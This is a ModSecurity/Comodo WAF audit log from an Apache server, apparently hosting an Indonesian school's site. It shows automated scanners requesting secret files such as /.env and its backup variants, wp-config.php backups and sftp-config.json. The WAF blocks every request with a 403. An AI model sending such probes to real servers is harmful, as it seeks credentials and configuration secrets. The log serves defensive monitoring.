charset=iso-8859-1 --c19b653f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749651660994831 3191 (- - -) Stopwatch2: 1749651660994831 3191; combined=1368, p1=465, p2=874, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c19b653f-Z-- --7327be29-A-- [11/Jun/2025:21:44:08 +0700] aEmWOG7bf2YTFvcEXPuLAAAAAE4 103.236.140.4 44794 103.236.140.4 8181 --7327be29-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept-Charset: utf-8 --7327be29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7327be29-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749653048262226 893 (- - -) Stopwatch2: 1749653048262226 893; combined=341, p1=297, p2=0, p3=0, p4=0, p5=43, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7327be29-Z-- --aa85f96c-A-- [11/Jun/2025:21:56:51 +0700] aEmZM5P8TulJ-kfHNvEGzgAAANc 103.236.140.4 45000 103.236.140.4 8181 --aa85f96c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.93.89.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.93.89.50 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --aa85f96c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aa85f96c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749653811183605 1889 (- - -) Stopwatch2: 1749653811183605 1889; combined=298, p1=261, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aa85f96c-Z-- --35fa7901-A-- [11/Jun/2025:21:56:52 +0700] aEmZNNDFbATf6vJlOUt7dwAAAIM 103.236.140.4 45004 103.236.140.4 8181 --35fa7901-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.93.89.50 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.93.89.50 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --35fa7901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35fa7901-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749653812236641 699 (- - -) Stopwatch2: 1749653812236641 699; combined=296, p1=263, p2=0, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35fa7901-Z-- --908f0a62-A-- [11/Jun/2025:22:10:34 +0700] aEmcam7bf2YTFvcEXPuLMAAAAFg 103.236.140.4 45174 103.236.140.4 8181 --908f0a62-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.80 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.825.0 Chrome/14.0.825.0 Safari/535.1 Accept-Charset: utf-8 --908f0a62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --908f0a62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749654634569244 648 (- - -) Stopwatch2: 1749654634569244 648; combined=252, p1=223, p2=0, p3=0, p4=0, p5=29, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --908f0a62-Z-- --c2745851-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9AAAAM4 103.236.140.4 45296 103.236.140.4 8181 --c2745851-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --c2745851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2745851-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487076704 856 (- - -) Stopwatch2: 1749655487076704 856; combined=364, p1=325, p2=0, p3=0, p4=0, p5=39, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2745851-Z-- --8042fa17-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9QAAAM0 103.236.140.4 45298 103.236.140.4 8181 --8042fa17-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --8042fa17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8042fa17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487320448 627 (- - -) Stopwatch2: 1749655487320448 627; combined=251, p1=218, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8042fa17-Z-- --10754701-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9gAAANE 103.236.140.4 45300 103.236.140.4 8181 --10754701-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --10754701-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10754701-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487539638 802 (- - -) Stopwatch2: 1749655487539638 802; combined=338, p1=301, p2=0, p3=0, p4=0, p5=36, sr=114, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10754701-Z-- --ec61b76f-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG9wAAANM 103.236.140.4 45302 103.236.140.4 8181 --ec61b76f-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --ec61b76f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec61b76f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487745180 638 (- - -) Stopwatch2: 1749655487745180 638; combined=269, p1=236, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec61b76f-Z-- --62668b35-A-- [11/Jun/2025:22:24:47 +0700] aEmfv5P8TulJ-kfHNvEG-AAAANY 103.236.140.4 45304 103.236.140.4 8181 --62668b35-B-- GET /.env.old HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --62668b35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62668b35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655487968819 635 (- - -) Stopwatch2: 1749655487968819 635; combined=250, p1=215, p2=0, p3=0, p4=0, p5=34, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62668b35-Z-- --5776f830-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG-QAAANQ 103.236.140.4 45306 103.236.140.4 8181 --5776f830-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --5776f830-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5776f830-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488182633 673 (- - -) Stopwatch2: 1749655488182633 673; combined=297, p1=264, p2=0, p3=0, p4=0, p5=33, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5776f830-Z-- --1c314f78-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG-gAAANU 103.236.140.4 45308 103.236.140.4 8181 --1c314f78-B-- GET /.env.sample HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --1c314f78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c314f78-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488401004 664 (- - -) Stopwatch2: 1749655488401004 664; combined=260, p1=225, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c314f78-Z-- --deaf941e-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG-wAAAMA 103.236.140.4 45310 103.236.140.4 8181 --deaf941e-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --deaf941e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --deaf941e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488622826 639 (- - -) Stopwatch2: 1749655488622826 639; combined=247, p1=214, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --deaf941e-Z-- --cb86c721-A-- [11/Jun/2025:22:24:48 +0700] aEmfwJP8TulJ-kfHNvEG_AAAANI 103.236.140.4 45312 103.236.140.4 8181 --cb86c721-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --cb86c721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb86c721-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655488851879 628 (- - -) Stopwatch2: 1749655488851879 628; combined=258, p1=214, p2=0, p3=0, p4=0, p5=44, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb86c721-Z-- --535f3742-A-- [11/Jun/2025:22:24:49 +0700] aEmfwZP8TulJ-kfHNvEG_QAAAMQ 103.236.140.4 45314 103.236.140.4 8181 --535f3742-B-- GET /.env.development HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 193.233.85.69 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 193.233.85.69 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --535f3742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --535f3742-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749655489074053 776 (- - -) Stopwatch2: 1749655489074053 776; combined=326, p1=285, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --535f3742-Z-- --3453fc48-A-- [11/Jun/2025:22:41:55 +0700] aEmjw27bf2YTFvcEXPuLXwAAAE8 103.236.140.4 45470 103.236.140.4 8181 --3453fc48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 147.182.248.135 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 147.182.248.135 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --3453fc48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3453fc48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749656515722546 891 (- - -) Stopwatch2: 1749656515722546 891; combined=371, p1=337, p2=0, p3=0, p4=0, p5=33, sr=125, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3453fc48-Z-- --09712c74-A-- [11/Jun/2025:23:22:25 +0700] aEmtQQI48YPcPeAOw9tVMAAAABA 103.236.140.4 46344 103.236.140.4 8181 --09712c74-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --09712c74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --09712c74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658945292853 936 (- - -) Stopwatch2: 1749658945292853 936; combined=364, p1=321, p2=0, p3=0, p4=0, p5=43, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --09712c74-Z-- --7158261b-A-- [11/Jun/2025:23:22:26 +0700] aEmtQm7bf2YTFvcEXPuLhwAAAFg 103.236.140.4 46346 103.236.140.4 8181 --7158261b-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --7158261b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7158261b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658946356331 682 (- - -) Stopwatch2: 1749658946356331 682; combined=259, p1=229, p2=0, p3=0, p4=0, p5=30, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7158261b-Z-- --13dee754-A-- [11/Jun/2025:23:22:29 +0700] aEmtRQI48YPcPeAOw9tVMQAAABc 103.236.140.4 46348 103.236.140.4 8181 --13dee754-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --13dee754-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13dee754-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658949877193 857 (- - -) Stopwatch2: 1749658949877193 857; combined=318, p1=278, p2=0, p3=0, p4=0, p5=40, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13dee754-Z-- --d87f4d13-A-- [11/Jun/2025:23:22:43 +0700] aEmtU27bf2YTFvcEXPuLigAAAEc 103.236.140.4 46356 103.236.140.4 8181 --d87f4d13-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/29.0 Accept: */* --d87f4d13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d87f4d13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749658963628927 877 (- - -) Stopwatch2: 1749658963628927 877; combined=343, p1=302, p2=0, p3=0, p4=0, p5=41, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d87f4d13-Z-- --928c7512-A-- [11/Jun/2025:23:29:11 +0700] aEmu1wI48YPcPeAOw9tVQgAAAAM 103.236.140.4 46416 103.236.140.4 8181 --928c7512-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.223.161.118 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.223.161.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Accept-Charset: utf-8 --928c7512-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --928c7512-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749659351953023 939 (- - -) Stopwatch2: 1749659351953023 939; combined=416, p1=379, p2=0, p3=0, p4=0, p5=37, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 